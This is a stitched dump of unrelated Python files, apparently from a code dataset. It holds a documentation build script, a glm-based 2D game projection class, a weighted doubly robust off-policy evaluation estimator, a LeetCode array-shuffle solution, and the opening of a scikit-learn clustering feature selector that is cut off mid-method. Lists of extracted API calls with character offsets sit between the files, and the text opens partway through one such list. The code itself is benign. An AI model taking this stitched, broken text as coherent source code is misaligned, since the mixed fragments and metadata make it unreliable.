'(cls.evaluate_node, context=context, **kwargs)\n', (15978, 16024), False, 'import functools\n'), ((28968, 29021), 'numpy.ravel_multi_index', 'np.ravel_multi_index', (['key'], {'dims': 'self.shape', 'order': '"""C"""'}), "(key, dims=self.shape, order='C')\n", (28988, 29021), True, 'import numpy as np\n'), ((30292, 30309), 'numpy.asarray', 'np.asarray', (['[var]'], {}), '([var])\n', (30302, 30309), True, 'import numpy as np\n'), ((2379, 2391), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2389, 2391), False, 'import uuid\n'), ((13002, 13014), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (13012, 13014), False, 'import uuid\n'), ((28852, 28871), 'numpy.prod', 'np.prod', (['self.shape'], {}), '(self.shape)\n', (28859, 28871), True, 'import numpy as np\n'), ((30618, 30636), 'numpy.prod', 'np.prod', (['var.shape'], {}), '(var.shape)\n', (30625, 30636), True, 'import numpy as np\n'), ((30640, 30658), 'numpy.prod', 'np.prod', (['out_shape'], {}), '(out_shape)\n', (30647, 30658), True, 'import numpy as np\n'), ((30896, 30911), 'numpy.squeeze', 'np.squeeze', (['var'], {}), '(var)\n', (30906, 30911), True, 'import numpy as np\n'), ((30961, 30979), 'numpy.prod', 'np.prod', (['var.shape'], {}), '(var.shape)\n', (30968, 30979), True, 'import numpy as np\n'), ((30983, 31001), 'numpy.prod', 'np.prod', (['out_shape'], {}), '(out_shape)\n', (30990, 31001), True, 'import numpy as np\n'), ((38171, 38188), 'numpy.product', 'np.product', (['shape'], {}), '(shape)\n', (38181, 38188), True, 'import numpy as np\n'), ((6037, 6050), 'numpy.int', 'np.int', (['shape'], {}), '(shape)\n', (6043, 6050), True, 'import numpy as np\n'), ((30554, 30569), 'numpy.asarray', 'np.asarray', (['var'], {}), '(var)\n', (30564, 30569), True, 'import numpy as np\n'), ((31938, 31979), 'numpy.asarray', 'np.asarray', (['[var[idx] for idx in indices]'], {}), '([var[idx] for idx in indices])\n', (31948, 31979), True, 'import numpy as np\n'), ((30828, 30855), 'numpy.expand_dims', 'np.expand_dims', (['var'], {'axis': 'i'}), '(var, axis=i)\n', (30842, 30855), True, 'import numpy as np\n')] |
"""Build the C client docs.
"""
from __future__ import with_statement
import os
import shutil
import socket
import subprocess
import time
import urllib2
def clean_dir(dir):
try:
shutil.rmtree(dir)
except:
pass
os.makedirs(dir)
def gen_api(dir):
clean_dir(dir)
clean_dir("docs/source/doxygen")
with open(os.devnull, 'w') as null:
subprocess.call(["doxygen", "doxygenConfig"], stdout=null, stderr=null)
os.rename("docs/source/doxygen/html", dir)
def gen_sphinx(dir):
clean_dir(dir)
os.chdir("docs/source/sphinx")
with open(os.devnull, 'w') as null:
subprocess.call(["make", "html"], stdout=null, stderr=null)
os.chdir("../../../")
if os.path.isdir("docs/source/sphinx/build/html"):
os.rename("docs/source/sphinx/build/html", dir)
def version():
"""Get the driver version from doxygenConfig.
"""
with open("doxygenConfig") as f:
for line in f.readlines():
if line.startswith("PROJECT_NUMBER"):
return line.split("=")[1].strip()
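# Note added for clarity: this expects doxygenConfig to contain a line such as
# `PROJECT_NUMBER = 1.0.0` (the value here is only an example) and returns the
# text after the "=" sign.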
def main():
print("Generating Sphinx docs in docs/html")
gen_sphinx("docs/html")
print("Generating Doxygen docs in docs/html/api")
gen_api("docs/html/api")
if __name__ == "__main__":
main()
| [
"os.makedirs",
"os.rename",
"os.chdir",
"os.path.isdir",
"subprocess.call",
"shutil.rmtree"
] | [((240, 256), 'os.makedirs', 'os.makedirs', (['dir'], {}), '(dir)\n', (251, 256), False, 'import os\n'), ((458, 500), 'os.rename', 'os.rename', (['"""docs/source/doxygen/html"""', 'dir'], {}), "('docs/source/doxygen/html', dir)\n", (467, 500), False, 'import os\n'), ((546, 576), 'os.chdir', 'os.chdir', (['"""docs/source/sphinx"""'], {}), "('docs/source/sphinx')\n", (554, 576), False, 'import os\n'), ((691, 712), 'os.chdir', 'os.chdir', (['"""../../../"""'], {}), "('../../../')\n", (699, 712), False, 'import os\n'), ((720, 766), 'os.path.isdir', 'os.path.isdir', (['"""docs/source/sphinx/build/html"""'], {}), "('docs/source/sphinx/build/html')\n", (733, 766), False, 'import os\n'), ((192, 210), 'shutil.rmtree', 'shutil.rmtree', (['dir'], {}), '(dir)\n', (205, 210), False, 'import shutil\n'), ((381, 452), 'subprocess.call', 'subprocess.call', (["['doxygen', 'doxygenConfig']"], {'stdout': 'null', 'stderr': 'null'}), "(['doxygen', 'doxygenConfig'], stdout=null, stderr=null)\n", (396, 452), False, 'import subprocess\n'), ((626, 685), 'subprocess.call', 'subprocess.call', (["['make', 'html']"], {'stdout': 'null', 'stderr': 'null'}), "(['make', 'html'], stdout=null, stderr=null)\n", (641, 685), False, 'import subprocess\n'), ((776, 823), 'os.rename', 'os.rename', (['"""docs/source/sphinx/build/html"""', 'dir'], {}), "('docs/source/sphinx/build/html', dir)\n", (785, 823), False, 'import os\n')] |
import glm
import math
from lib.opengl import RenderSettings
class GameProjection:
def __init__(self, rs: "GameRenderSettings"):
self.rs = rs
self.scale = 10.
self.rotation_deg = 0.
self.location = glm.vec3(0)
self._stack = []
def projection_matrix_4(self) -> glm.mat4:
scale = 1.
ratio = self.rs.render_width / self.rs.render_height
m = glm.ortho(-scale * ratio, scale * ratio, -scale, scale, -10, 10)
return m
def transformation_matrix_4(self) -> glm.mat4:
m = glm.rotate(
glm.mat4(1), -self.rotation_deg / 180 * glm.pi(), glm.vec3(0, 0, 1)
)
m = m * glm.scale(glm.mat4(), glm.vec3(2. / self.scale))
m = m * glm.translate(glm.mat4(), glm.vec3(-self.location.x, -self.location.y, 0))
return m
def transformation_matrix(self) -> glm.mat3:
m = rotation_matrix_2d(self.rotation_deg)
m *= self.scale * .5
m[2][0] = self.location.x
m[2][1] = self.location.y
return m
def push(self):
self._stack.append({
"scale": self.scale,
"rotation": self.rotation_deg,
"location": self.location.__copy__(),
})
def pop(self):
s = self._stack.pop(-1)
self.scale = s["scale"]
self.rotation_deg = s["rotation"]
self.location = s["location"]
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.pop()
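# Usage sketch (added for illustration, not part of the original file): the
# projection can be used as a context manager to apply temporary view changes
# and restore them afterwards, where `settings` is a GameRenderSettings
# instance (defined below).
#
#     with settings.projection as proj:
#         proj.scale = 5.
#         proj.rotation_deg = 45.
#         ...  # render with the temporary view
#     # scale, rotation and location are restored here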
def rotation_matrix_2d(degree: float) -> glm.mat3:
a = degree / 180. * math.pi
sa = math.sin(a)
ca = math.cos(a)
return glm.mat3(
ca, sa, 0,
-sa, ca, 0,
0, 0, 1
)
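# Quick sanity sketch (added for illustration): glm fills matrices column by
# column, so the constructor above lays out a standard 2D rotation with a
# homogeneous third row/column. Rotating the x axis by 90 degrees maps it onto
# the y axis:
#
#     rotation_matrix_2d(90.) * glm.vec3(1, 0, 1)  # ~ vec3(0, 1, 1)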
class GameRenderSettings(RenderSettings):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.projection = GameProjection(self)
| [
"glm.mat4",
"glm.mat3",
"math.cos",
"glm.vec3",
"glm.pi",
"math.sin",
"glm.ortho"
] | [((1632, 1643), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (1640, 1643), False, 'import math\n'), ((1653, 1664), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (1661, 1664), False, 'import math\n'), ((1676, 1716), 'glm.mat3', 'glm.mat3', (['ca', 'sa', '(0)', '(-sa)', 'ca', '(0)', '(0)', '(0)', '(1)'], {}), '(ca, sa, 0, -sa, ca, 0, 0, 0, 1)\n', (1684, 1716), False, 'import glm\n'), ((238, 249), 'glm.vec3', 'glm.vec3', (['(0)'], {}), '(0)\n', (246, 249), False, 'import glm\n'), ((415, 479), 'glm.ortho', 'glm.ortho', (['(-scale * ratio)', '(scale * ratio)', '(-scale)', 'scale', '(-10)', '(10)'], {}), '(-scale * ratio, scale * ratio, -scale, scale, -10, 10)\n', (424, 479), False, 'import glm\n'), ((585, 596), 'glm.mat4', 'glm.mat4', (['(1)'], {}), '(1)\n', (593, 596), False, 'import glm\n'), ((635, 652), 'glm.vec3', 'glm.vec3', (['(0)', '(0)', '(1)'], {}), '(0, 0, 1)\n', (643, 652), False, 'import glm\n'), ((625, 633), 'glm.pi', 'glm.pi', ([], {}), '()\n', (631, 633), False, 'import glm\n'), ((689, 699), 'glm.mat4', 'glm.mat4', ([], {}), '()\n', (697, 699), False, 'import glm\n'), ((701, 727), 'glm.vec3', 'glm.vec3', (['(2.0 / self.scale)'], {}), '(2.0 / self.scale)\n', (709, 727), False, 'import glm\n'), ((758, 768), 'glm.mat4', 'glm.mat4', ([], {}), '()\n', (766, 768), False, 'import glm\n'), ((770, 817), 'glm.vec3', 'glm.vec3', (['(-self.location.x)', '(-self.location.y)', '(0)'], {}), '(-self.location.x, -self.location.y, 0)\n', (778, 817), False, 'import glm\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import itertools
import logging
import numpy as np
import scipy as sp
import torch
from ml.rl.evaluation.cpe import CpeEstimate
from ml.rl.evaluation.evaluation_data_page import EvaluationDataPage
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class WeightedSequentialDoublyRobustEstimator:
NUM_SUBSETS_FOR_CB_ESTIMATES = 25
CONFIDENCE_INTERVAL = 0.9
NUM_BOOTSTRAP_SAMPLES = 50
BOOTSTRAP_SAMPLE_PCT = 0.5
def __init__(self, gamma):
self.gamma = gamma
def estimate(
self,
edp: EvaluationDataPage,
num_j_steps,
whether_self_normalize_importance_weights,
) -> CpeEstimate:
# For details, visit https://arxiv.org/pdf/1604.00923.pdf Section 5, 7, 8
(
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
) = WeightedSequentialDoublyRobustEstimator.transform_to_equal_length_trajectories(
edp.mdp_id,
edp.action_mask.cpu().numpy(),
edp.logged_rewards.cpu().numpy().flatten(),
edp.logged_propensities.cpu().numpy().flatten(),
edp.model_propensities.cpu().numpy(),
edp.model_values.cpu().numpy(),
)
num_trajectories = actions.shape[0]
trajectory_length = actions.shape[1]
j_steps = [float("inf")]
if num_j_steps > 1:
j_steps.append(-1)
if num_j_steps > 2:
interval = trajectory_length // (num_j_steps - 1)
j_steps.extend([i * interval for i in range(1, num_j_steps - 1)])
target_propensity_for_logged_action = np.sum(
np.multiply(target_propensities, actions), axis=2
)
estimated_q_values_for_logged_action = np.sum(
np.multiply(estimated_q_values, actions), axis=2
)
estimated_state_values = np.sum(
np.multiply(target_propensities, estimated_q_values), axis=2
)
importance_weights = target_propensity_for_logged_action / logged_propensities
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([num_trajectories, 1]) * 1.0 / num_trajectories
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
discounts = np.logspace(
start=0, stop=trajectory_length - 1, num=trajectory_length, base=self.gamma
)
j_step_return_trajectories = []
for j_step in j_steps:
j_step_return_trajectories.append(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values_for_logged_action,
j_step,
)
)
j_step_return_trajectories = np.array(j_step_return_trajectories)
j_step_returns = np.sum(j_step_return_trajectories, axis=1)
if len(j_step_returns) == 1:
weighted_doubly_robust = j_step_returns[0]
weighted_doubly_robust_std_error = 0.0
else:
# break trajectories into several subsets to estimate confidence bounds
infinite_step_returns = []
num_subsets = int(
min(
num_trajectories / 2,
WeightedSequentialDoublyRobustEstimator.NUM_SUBSETS_FOR_CB_ESTIMATES,
)
)
interval = num_trajectories / num_subsets
for i in range(num_subsets):
trajectory_subset = np.arange(
int(i * interval), int((i + 1) * interval)
)
importance_weights = (
target_propensity_for_logged_action[trajectory_subset]
/ logged_propensities[trajectory_subset]
)
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([len(trajectory_subset), 1]) * 1.0 / len(trajectory_subset)
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
infinite_step_return = np.sum(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards[trajectory_subset],
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values[trajectory_subset],
estimated_q_values_for_logged_action[trajectory_subset],
float("inf"),
)
)
infinite_step_returns.append(infinite_step_return)
# Compute weighted_doubly_robust mean point estimate using all data
weighted_doubly_robust = self.compute_weighted_doubly_robust_point_estimate(
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
)
# Use bootstrapping to compute weighted_doubly_robust standard error
bootstrapped_means = []
sample_size = int(
WeightedSequentialDoublyRobustEstimator.BOOTSTRAP_SAMPLE_PCT
* num_subsets
)
for _ in range(
WeightedSequentialDoublyRobustEstimator.NUM_BOOTSTRAP_SAMPLES
):
random_idxs = np.random.choice(num_j_steps, sample_size, replace=False)
random_idxs.sort()
wdr_estimate = self.compute_weighted_doubly_robust_point_estimate(
j_steps=[j_steps[i] for i in random_idxs],
num_j_steps=sample_size,
j_step_returns=j_step_returns[random_idxs],
infinite_step_returns=infinite_step_returns,
j_step_return_trajectories=j_step_return_trajectories[random_idxs],
)
bootstrapped_means.append(wdr_estimate)
weighted_doubly_robust_std_error = np.std(bootstrapped_means)
episode_values = np.sum(np.multiply(rewards, discounts), axis=1)
denominator = np.nanmean(episode_values)
if abs(denominator) < 1e-6:
return CpeEstimate(
raw=0.0, normalized=0.0, raw_std_error=0.0, normalized_std_error=0.0
)
return CpeEstimate(
raw=weighted_doubly_robust,
normalized=weighted_doubly_robust / denominator,
raw_std_error=weighted_doubly_robust_std_error,
normalized_std_error=weighted_doubly_robust_std_error / denominator,
)
def compute_weighted_doubly_robust_point_estimate(
self,
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
):
low_bound, high_bound = WeightedSequentialDoublyRobustEstimator.confidence_bounds(
infinite_step_returns,
WeightedSequentialDoublyRobustEstimator.CONFIDENCE_INTERVAL,
)
# decompose error into bias + variance
j_step_bias = np.zeros([num_j_steps])
where_lower = np.where(j_step_returns < low_bound)[0]
j_step_bias[where_lower] = low_bound - j_step_returns[where_lower]
where_higher = np.where(j_step_returns > high_bound)[0]
j_step_bias[where_higher] = j_step_returns[where_higher] - high_bound
covariance = np.cov(j_step_return_trajectories)
error = covariance + j_step_bias.T * j_step_bias
# minimize mse error
constraint = {"type": "eq", "fun": lambda x: np.sum(x) - 1.0}
x = np.zeros([len(j_steps)])
res = sp.optimize.minimize(
mse_loss,
x,
args=error,
constraints=constraint,
bounds=[(0, 1) for _ in range(x.shape[0])],
)
x = np.array(res.x)
return float(np.dot(x, j_step_returns))
@staticmethod
def transform_to_equal_length_trajectories(
mdp_ids,
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
):
"""
Take in samples (action, rewards, propensities, etc.) and output lists
        of equal-length trajectories (episodes) according to terminals.
        As the raw trajectories are of various lengths, the shorter ones are
        padded with zeros (or ones) at the end.
"""
num_actions = len(target_propensities[0])
terminals = np.zeros(mdp_ids.shape[0])
for x in range(0, mdp_ids.shape[0]):
if x + 1 == mdp_ids.shape[0] or mdp_ids[x, 0] != mdp_ids[x + 1, 0]:
terminals[x] = 1
trajectories = []
episode_start = 0
episode_ends = np.nonzero(terminals)[0]
if len(terminals) - 1 not in episode_ends:
episode_ends = np.append(episode_ends, len(terminals) - 1)
for episode_end in episode_ends:
trajectories.append(np.arange(episode_start, episode_end + 1))
episode_start = episode_end + 1
action_trajectories = []
reward_trajectories = []
logged_propensity_trajectories = []
target_propensity_trajectories = []
Q_value_trajectories = []
for trajectory in trajectories:
action_trajectories.append(actions[trajectory])
reward_trajectories.append(rewards[trajectory])
logged_propensity_trajectories.append(logged_propensities[trajectory])
target_propensity_trajectories.append(target_propensities[trajectory])
Q_value_trajectories.append(estimated_q_values[trajectory])
def to_equal_length(x, fill_value):
x_equal_length = np.array(
list(itertools.zip_longest(*x, fillvalue=fill_value))
).swapaxes(0, 1)
return x_equal_length
action_trajectories = to_equal_length(
action_trajectories, np.zeros([num_actions])
)
reward_trajectories = to_equal_length(reward_trajectories, 0)
logged_propensity_trajectories = to_equal_length(
logged_propensity_trajectories, 1
)
target_propensity_trajectories = to_equal_length(
target_propensity_trajectories, np.zeros([num_actions])
)
Q_value_trajectories = to_equal_length(
Q_value_trajectories, np.zeros([num_actions])
)
return (
action_trajectories,
reward_trajectories,
logged_propensity_trajectories,
target_propensity_trajectories,
Q_value_trajectories,
)
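    # Added illustration (not original text): e.g. two episodes of lengths 2 and 3
    # come back as arrays whose first dimension is 2 and second dimension is 3,
    # with the shorter episode padded using the fill values above (zeros or zero
    # vectors, ones for logged propensities).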
@staticmethod
def normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
):
if whether_self_normalize_importance_weights:
sum_importance_weights = np.sum(importance_weights, axis=0)
where_zeros = np.where(sum_importance_weights == 0.0)[0]
sum_importance_weights[where_zeros] = len(importance_weights)
importance_weights[:, where_zeros] = 1.0
importance_weights /= sum_importance_weights
return importance_weights
else:
importance_weights /= importance_weights.shape[0]
return importance_weights
@staticmethod
def calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values,
j_step,
):
trajectory_length = len(rewards[0])
num_trajectories = len(rewards)
j_step = int(min(j_step, trajectory_length - 1))
weighted_discounts = np.multiply(discounts, importance_weights)
weighted_discounts_one_earlier = np.multiply(
discounts, importance_weights_one_earlier
)
importance_sampled_cumulative_reward = np.sum(
np.multiply(weighted_discounts[:, : j_step + 1], rewards[:, : j_step + 1]),
axis=1,
)
if j_step < trajectory_length - 1:
direct_method_value = (
weighted_discounts_one_earlier[:, j_step + 1]
* estimated_state_values[:, j_step + 1]
)
else:
direct_method_value = np.zeros([num_trajectories])
control_variate = np.sum(
np.multiply(
weighted_discounts[:, : j_step + 1], estimated_q_values[:, : j_step + 1]
)
- np.multiply(
weighted_discounts_one_earlier[:, : j_step + 1],
estimated_state_values[:, : j_step + 1],
),
axis=1,
)
j_step_return = (
importance_sampled_cumulative_reward + direct_method_value - control_variate
)
return j_step_return
@staticmethod
def confidence_bounds(x, confidence):
n = len(x)
m, se = np.mean(x), sp.stats.sem(x)
h = se * sp.stats.t._ppf((1 + confidence) / 2.0, n - 1)
return m - h, m + h
def mse_loss(x, error):
return np.dot(np.dot(x, error), x.T)
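# Note added for clarity (an interpretation of the code above, not original text):
# the per-j-step estimates are blended with weights x found by the constrained
# minimization in compute_weighted_doubly_robust_point_estimate, i.e. minimizing
# x @ error @ x.T subject to sum(x) == 1 and 0 <= x_i <= 1, where `error`
# combines the covariance of the per-trajectory j-step returns with a
# squared-bias term measured against the confidence bounds of the
# infinite-step returns.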
| [
"logging.getLogger",
"scipy.stats.t._ppf",
"numpy.hstack",
"numpy.array",
"numpy.nanmean",
"scipy.stats.sem",
"numpy.cov",
"numpy.arange",
"numpy.mean",
"numpy.multiply",
"numpy.where",
"numpy.dot",
"ml.rl.evaluation.cpe.CpeEstimate",
"numpy.logspace",
"numpy.ones",
"numpy.random.choice",
"itertools.zip_longest",
"numpy.nonzero",
"numpy.std",
"numpy.sum",
"numpy.zeros",
"numpy.cumprod"
] | [((305, 332), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (322, 332), False, 'import logging\n'), ((2219, 2257), 'numpy.cumprod', 'np.cumprod', (['importance_weights'], {'axis': '(1)'}), '(importance_weights, axis=1)\n', (2229, 2257), True, 'import numpy as np\n'), ((2604, 2675), 'numpy.hstack', 'np.hstack', (['[importance_weights_one_earlier, importance_weights[:, :-1]]'], {}), '([importance_weights_one_earlier, importance_weights[:, :-1]])\n', (2613, 2675), True, 'import numpy as np\n'), ((2719, 2811), 'numpy.logspace', 'np.logspace', ([], {'start': '(0)', 'stop': '(trajectory_length - 1)', 'num': 'trajectory_length', 'base': 'self.gamma'}), '(start=0, stop=trajectory_length - 1, num=trajectory_length,\n base=self.gamma)\n', (2730, 2811), True, 'import numpy as np\n'), ((3379, 3415), 'numpy.array', 'np.array', (['j_step_return_trajectories'], {}), '(j_step_return_trajectories)\n', (3387, 3415), True, 'import numpy as np\n'), ((3442, 3484), 'numpy.sum', 'np.sum', (['j_step_return_trajectories'], {'axis': '(1)'}), '(j_step_return_trajectories, axis=1)\n', (3448, 3484), True, 'import numpy as np\n'), ((7126, 7152), 'numpy.nanmean', 'np.nanmean', (['episode_values'], {}), '(episode_values)\n', (7136, 7152), True, 'import numpy as np\n'), ((7336, 7549), 'ml.rl.evaluation.cpe.CpeEstimate', 'CpeEstimate', ([], {'raw': 'weighted_doubly_robust', 'normalized': '(weighted_doubly_robust / denominator)', 'raw_std_error': 'weighted_doubly_robust_std_error', 'normalized_std_error': '(weighted_doubly_robust_std_error / denominator)'}), '(raw=weighted_doubly_robust, normalized=weighted_doubly_robust /\n denominator, raw_std_error=weighted_doubly_robust_std_error,\n normalized_std_error=weighted_doubly_robust_std_error / denominator)\n', (7347, 7549), False, 'from ml.rl.evaluation.cpe import CpeEstimate\n'), ((8085, 8108), 'numpy.zeros', 'np.zeros', (['[num_j_steps]'], {}), '([num_j_steps])\n', (8093, 8108), True, 'import numpy as np\n'), ((8410, 8444), 'numpy.cov', 'np.cov', (['j_step_return_trajectories'], {}), '(j_step_return_trajectories)\n', (8416, 8444), True, 'import numpy as np\n'), ((8851, 8866), 'numpy.array', 'np.array', (['res.x'], {}), '(res.x)\n', (8859, 8866), True, 'import numpy as np\n'), ((9494, 9520), 'numpy.zeros', 'np.zeros', (['mdp_ids.shape[0]'], {}), '(mdp_ids.shape[0])\n', (9502, 9520), True, 'import numpy as np\n'), ((12708, 12750), 'numpy.multiply', 'np.multiply', (['discounts', 'importance_weights'], {}), '(discounts, importance_weights)\n', (12719, 12750), True, 'import numpy as np\n'), ((12792, 12846), 'numpy.multiply', 'np.multiply', (['discounts', 'importance_weights_one_earlier'], {}), '(discounts, importance_weights_one_earlier)\n', (12803, 12846), True, 'import numpy as np\n'), ((14105, 14121), 'numpy.dot', 'np.dot', (['x', 'error'], {}), '(x, error)\n', (14111, 14121), True, 'import numpy as np\n'), ((1792, 1833), 'numpy.multiply', 'np.multiply', (['target_propensities', 'actions'], {}), '(target_propensities, actions)\n', (1803, 1833), True, 'import numpy as np\n'), ((1919, 1959), 'numpy.multiply', 'np.multiply', (['estimated_q_values', 'actions'], {}), '(estimated_q_values, actions)\n', (1930, 1959), True, 'import numpy as np\n'), ((2031, 2083), 'numpy.multiply', 'np.multiply', (['target_propensities', 'estimated_q_values'], {}), '(target_propensities, estimated_q_values)\n', (2042, 2083), True, 'import numpy as np\n'), ((7003, 7029), 'numpy.std', 'np.std', (['bootstrapped_means'], {}), '(bootstrapped_means)\n', (7009, 7029), 
True, 'import numpy as np\n'), ((7063, 7094), 'numpy.multiply', 'np.multiply', (['rewards', 'discounts'], {}), '(rewards, discounts)\n', (7074, 7094), True, 'import numpy as np\n'), ((7208, 7293), 'ml.rl.evaluation.cpe.CpeEstimate', 'CpeEstimate', ([], {'raw': '(0.0)', 'normalized': '(0.0)', 'raw_std_error': '(0.0)', 'normalized_std_error': '(0.0)'}), '(raw=0.0, normalized=0.0, raw_std_error=0.0,\n normalized_std_error=0.0)\n', (7219, 7293), False, 'from ml.rl.evaluation.cpe import CpeEstimate\n'), ((8131, 8167), 'numpy.where', 'np.where', (['(j_step_returns < low_bound)'], {}), '(j_step_returns < low_bound)\n', (8139, 8167), True, 'import numpy as np\n'), ((8269, 8306), 'numpy.where', 'np.where', (['(j_step_returns > high_bound)'], {}), '(j_step_returns > high_bound)\n', (8277, 8306), True, 'import numpy as np\n'), ((8888, 8913), 'numpy.dot', 'np.dot', (['x', 'j_step_returns'], {}), '(x, j_step_returns)\n', (8894, 8913), True, 'import numpy as np\n'), ((9755, 9776), 'numpy.nonzero', 'np.nonzero', (['terminals'], {}), '(terminals)\n', (9765, 9776), True, 'import numpy as np\n'), ((10949, 10972), 'numpy.zeros', 'np.zeros', (['[num_actions]'], {}), '([num_actions])\n', (10957, 10972), True, 'import numpy as np\n'), ((11269, 11292), 'numpy.zeros', 'np.zeros', (['[num_actions]'], {}), '([num_actions])\n', (11277, 11292), True, 'import numpy as np\n'), ((11385, 11408), 'numpy.zeros', 'np.zeros', (['[num_actions]'], {}), '([num_actions])\n', (11393, 11408), True, 'import numpy as np\n'), ((11860, 11894), 'numpy.sum', 'np.sum', (['importance_weights'], {'axis': '(0)'}), '(importance_weights, axis=0)\n', (11866, 11894), True, 'import numpy as np\n'), ((12937, 13009), 'numpy.multiply', 'np.multiply', (['weighted_discounts[:, :j_step + 1]', 'rewards[:, :j_step + 1]'], {}), '(weighted_discounts[:, :j_step + 1], rewards[:, :j_step + 1])\n', (12948, 13009), True, 'import numpy as np\n'), ((13303, 13331), 'numpy.zeros', 'np.zeros', (['[num_trajectories]'], {}), '([num_trajectories])\n', (13311, 13331), True, 'import numpy as np\n'), ((13941, 13951), 'numpy.mean', 'np.mean', (['x'], {}), '(x)\n', (13948, 13951), True, 'import numpy as np\n'), ((13953, 13968), 'scipy.stats.sem', 'sp.stats.sem', (['x'], {}), '(x)\n', (13965, 13968), True, 'import scipy as sp\n'), ((13986, 14032), 'scipy.stats.t._ppf', 'sp.stats.t._ppf', (['((1 + confidence) / 2.0)', '(n - 1)'], {}), '((1 + confidence) / 2.0, n - 1)\n', (14001, 14032), True, 'import scipy as sp\n'), ((2497, 2527), 'numpy.ones', 'np.ones', (['[num_trajectories, 1]'], {}), '([num_trajectories, 1])\n', (2504, 2527), True, 'import numpy as np\n'), ((4435, 4473), 'numpy.cumprod', 'np.cumprod', (['importance_weights'], {'axis': '(1)'}), '(importance_weights, axis=1)\n', (4445, 4473), True, 'import numpy as np\n'), ((4887, 4958), 'numpy.hstack', 'np.hstack', (['[importance_weights_one_earlier, importance_weights[:, :-1]]'], {}), '([importance_weights_one_earlier, importance_weights[:, :-1]])\n', (4896, 4958), True, 'import numpy as np\n'), ((6381, 6438), 'numpy.random.choice', 'np.random.choice', (['num_j_steps', 'sample_size'], {'replace': '(False)'}), '(num_j_steps, sample_size, replace=False)\n', (6397, 6438), True, 'import numpy as np\n'), ((9976, 10017), 'numpy.arange', 'np.arange', (['episode_start', '(episode_end + 1)'], {}), '(episode_start, episode_end + 1)\n', (9985, 10017), True, 'import numpy as np\n'), ((11921, 11960), 'numpy.where', 'np.where', (['(sum_importance_weights == 0.0)'], {}), '(sum_importance_weights == 0.0)\n', (11929, 11960), True, 
'import numpy as np\n'), ((13379, 13467), 'numpy.multiply', 'np.multiply', (['weighted_discounts[:, :j_step + 1]', 'estimated_q_values[:, :j_step + 1]'], {}), '(weighted_discounts[:, :j_step + 1], estimated_q_values[:, :\n j_step + 1])\n', (13390, 13467), True, 'import numpy as np\n'), ((13509, 13612), 'numpy.multiply', 'np.multiply', (['weighted_discounts_one_earlier[:, :j_step + 1]', 'estimated_state_values[:, :j_step + 1]'], {}), '(weighted_discounts_one_earlier[:, :j_step + 1],\n estimated_state_values[:, :j_step + 1])\n', (13520, 13612), True, 'import numpy as np\n'), ((8585, 8594), 'numpy.sum', 'np.sum', (['x'], {}), '(x)\n', (8591, 8594), True, 'import numpy as np\n'), ((10756, 10803), 'itertools.zip_longest', 'itertools.zip_longest', (['*x'], {'fillvalue': 'fill_value'}), '(*x, fillvalue=fill_value)\n', (10777, 10803), False, 'import itertools\n')] |
# -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-08-03 10:48:30
# @Last Modified by: 何睿
# @Last Modified time: 2019-08-03 10:53:15
import copy
import random
from typing import List
class Solution:
def __init__(self, nums: List[int]):
self.shuffle_ = nums
self.original = copy.copy(nums)
def reset(self) -> List[int]:
"""
Resets the array to its original configuration and return it.
"""
return self.original
def shuffle(self) -> List[int]:
"""
Returns a random shuffling of the array.
"""
random.shuffle(self.shuffle_)
return self.shuffle_
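if __name__ == "__main__":
    # Small ad-hoc check (added for illustration; not part of the original solution).
    solution = Solution([1, 2, 3])
    print(solution.shuffle())  # some permutation of [1, 2, 3]
    print(solution.reset())   # [1, 2, 3]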
| [
"copy.copy",
"random.shuffle"
] | [((327, 342), 'copy.copy', 'copy.copy', (['nums'], {}), '(nums)\n', (336, 342), False, 'import copy\n'), ((619, 648), 'random.shuffle', 'random.shuffle', (['self.shuffle_'], {}), '(self.shuffle_)\n', (633, 648), False, 'import random\n')] |
import numpy as np
import sklearn
import pandas as pd
import scipy.spatial.distance as ssd
from scipy.cluster import hierarchy
from scipy.stats import chi2_contingency
from sklearn.base import BaseEstimator
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_selection import SelectKBest, SelectorMixin
from sklearn.pipeline import Pipeline
class SelectHierarchicalClustering(SelectorMixin, BaseEstimator):
"""
A transformer that clusters the features in X according to dist_matrix, and selects a feature from each cluster with
the highest chi2 score of X[feature] versus y
"""
def __init__(self, dist_matrix=None, threshold=1):
self.dist_matrix = dist_matrix
self.threshold = threshold
def _phi_coef(self, x, y):
"""
Calculates phi coefficient between features
Parameters
----------
x - feature x column
y - feature y column
Returns
----------
phi coefficient value
"""
confusion_matrix = pd.crosstab(x, y)
chi2 = chi2_contingency(confusion_matrix)[0]
n = confusion_matrix.sum().sum()
